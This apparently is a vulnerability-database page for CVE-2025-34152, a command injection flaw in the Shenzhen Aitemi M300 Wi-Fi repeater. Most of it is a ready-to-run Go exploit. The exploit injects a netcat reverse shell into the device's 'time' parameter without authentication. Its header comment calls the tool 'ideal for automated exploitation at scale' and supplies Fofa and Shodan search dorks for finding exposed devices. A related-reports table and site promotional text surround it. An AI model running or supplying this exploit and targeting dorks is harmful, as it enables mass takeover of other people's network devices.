| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for CVE-2025-34152 | 21 Sep 202513:56 | – | githubexploit | |
| CVE-2025-34152 | 7 Aug 202520:07 | – | circl | |
| Itemir M300 Wi-Fi Repeater 安全漏洞 | 7 Aug 202500:00 | – | cnnvd | |
| CVE-2025-34152 | 7 Aug 202516:44 | – | cve | |
| CVE-2025-34152 Shenzhen Aitemi M300 Wi-Fi Repeater OS Command Injection via Time Parameter | 7 Aug 202516:44 | – | cvelist | |
| EUVD-2025-23927 | 7 Aug 202516:44 | – | euvd | |
| Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param) | 10 Sep 202518:53 | – | metasploit | |
| Shenzhen Aitemi M300 Wi-Fi Repeater – Unauthenticated Remote Command Execution via `time` Parameter | 4 Feb 202607:00 | – | nuclei | |
| CVE-2025-34152 | 7 Aug 202517:15 | – | nvd | |
| 📄 Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated Remote Code Execution | 10 Sep 202500:00 | – | packetstorm |
package main
import (
"flag"
"fmt"
"io"
"net/http"
"net/url"
"os"
"strings"
)
/*
Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (CVE-2025-34152)
- does not require authentication (even when the login panel is enabled)
- does not reboot the device
- does not affect network configuration
- ideal for automated exploitation at scale
Dorks:
- Fofa: icon_hash="-741058468" && server="lighttpd/1.4.32"
- Shodan: http.favicon.hash:-741058468 lighttpd/1.4.32
*/
func main() {
host := flag.String("u", "", "Target host URL (e.g., http://192.168.11.1)")
lhost := flag.String("i", "", "Attacker IP for reverse shell")
lport := flag.String("p", "", "Attacker port for reverse shell")
proxyURL := flag.String("x", "", "Optional proxy URL (e.g., http://127.0.0.1:8080)")
flag.Parse()
if *host == "" || *lhost == "" || *lport == "" {
fmt.Printf("Usage: %s -u <host_url> -i <lhost> -p <lport> [-x <proxy_url>]\n", os.Args[0])
os.Exit(1)
}
h := strings.TrimRight(*host, "/")
endpoint := h + "/protocol.csp?"
raw := fmt.Sprintf("$(mkfifo /tmp/x; nc %s %s < /tmp/x | /bin/sh > /tmp/x 2>&1)", *lhost, *lport)
encoded := url.QueryEscape(raw)
encoded = strings.ReplaceAll(encoded, "+", "%20")
body := fmt.Sprintf("fname=system&opt=time_conf&function=set&time=%s", encoded)
req, err := http.NewRequest("POST", endpoint, strings.NewReader(body))
if err != nil {
fmt.Printf("[!] Request creation failed: %v\n", err)
os.Exit(1)
}
transport := &http.Transport{}
if *proxyURL != "" {
parsedURL, err := url.Parse(*proxyURL)
if err != nil {
fmt.Printf("[!] Invalid proxy URL: %v\n", err)
os.Exit(1)
}
transport.Proxy = http.ProxyURL(parsedURL)
}
client := &http.Client{Transport: transport}
resp, err := client.Do(req)
if err != nil {
fmt.Printf("[!] Request failed: %v\n", err)
os.Exit(1)
}
defer resp.Body.Close()
fmt.Printf("[+] Response %d\n", resp.StatusCode)
data, err := io.ReadAll(resp.Body)
if err != nil {
fmt.Printf("[!] Reading response failed: %v\n", err)
os.Exit(1)
}
fmt.Println(string(data))
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation